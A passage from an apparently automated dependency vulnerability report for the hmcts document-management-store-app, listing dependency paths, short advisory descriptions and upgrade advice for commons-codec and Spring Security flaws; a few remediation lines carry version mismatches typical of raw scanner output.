    Remediation: Upgrade to org.apache.tika:tika-parsers-standard-package@3.2.2.
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-cad-module@3.2.2 org.apache.tika:tika-parser-microsoft-module@3.2.2 org.apache.tika:tika-parser-zip-commons@3.2.2 org.apache.commons:commons-compress@1.28.0 commons-codec:commons-codec@1.11
    Remediation: Upgrade to org.apache.tika:tika-parsers-standard-package@3.2.2.
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-cad-module@3.2.2 org.apache.tika:tika-parser-microsoft-module@3.2.2 org.apache.poi:poi-ooxml@5.4.1 org.apache.commons:commons-compress@1.28.0 commons-codec:commons-codec@1.11
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-cad-module@3.2.2 org.apache.tika:tika-parser-microsoft-module@3.2.2 org.apache.poi:poi-ooxml@5.4.1 org.apache.poi:poi@5.4.1 commons-codec:commons-codec@1.11
    Remediation: Upgrade to org.apache.tika:tika-parsers-standard-package@3.2.2.
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-cad-module@3.2.2 org.apache.tika:tika-parser-microsoft-module@3.2.2 org.apache.poi:poi-scratchpad@5.4.1 org.apache.poi:poi@5.4.1 commons-codec:commons-codec@1.11
    Remediation: Upgrade to org.apache.tika:tika-parsers-standard-package@3.2.2.
  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.apache.tika:tika-parsers-standard-package@3.2.2 org.apache.tika:tika-parser-cad-module@3.2.2 org.apache.tika:tika-parser-microsoft-module@3.2.2 org.apache.tika:tika-parser-text-module@3.2.2 org.apache.commons:commons-csv@1.14.1 commons-codec:commons-codec@1.11
    Remediation: Upgrade to org.apache.tika:tika-parsers-standard-package@3.2.2.

Overview

commons-codec:commons-codec is a package that contains simple encoder and decoders for various formats such as Base64 and Hexadecimal.

Affected versions of this package are vulnerable to Information Exposure. When there is no byte array value that can be encoded into a string the Base32 implementation does not reject it, and instead decodes it into an arbitrary value which can be re-encoded again using the same implementation. This allows for information exposure exploits such as tunneling additional information via seemingly valid base 32 strings.

Remediation

Upgrade commons-codec:commons-codec to version 1.14 or higher.

References

low severity

Insecure Randomness

  • Vulnerable module: org.springframework.security:spring-security-core
  • Introduced through: org.springframework.security:spring-security-core@versions.springSecurity

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.security:spring-security-core@versions.springSecurity
    Remediation: Upgrade to org.springframework.security:spring-security-core@2.0.0.

Overview

org.springframework.security:spring-security-core is a package that provides security services for the Spring IO Platform.

Affected versions of this package are vulnerable to Insecure Randomness due to the usage of SecureRandomFactoryBean#setSeed function to configure a SecureRandom instance. In order for exploitation, an attacker will need to obtain the content generated from an application's seed value.

Remediation

Upgrade org.springframework.security:spring-security-core to version 4.2.12.RELEASE, 5.0.12.RELEASE, 5.1.5.RELEASE or higher.

References

low severity

Timing Attack

  • Vulnerable module: org.springframework.security:spring-security-web
  • Introduced through: org.springframework.security:spring-security-web@versions.springSecurity

Detailed paths

  • Introduced through: hmcts/document-management-store-app@hmcts/document-management-store-app#da54edd067c0cfa566f3b51d8da9523d9df6bd40 org.springframework.security:spring-security-web@versions.springSecurity
    Remediation: Upgrade to org.springframework.security:spring-security-web@5.2.9.RELEASE.

Overview

org.springframework.security:spring-security-web is a package within Spring Security that provides security services for the Spring IO Platform.

Affected versions of this package are vulnerable to Timing Attack. It is possible for an attacker to steal CSRF tokens through a timing attack.

Remediation

Upgrade org.springframework.security:spring-security-web to version 5.2.9.RELEASE, 5.3.7, 5.4.3 or higher.

References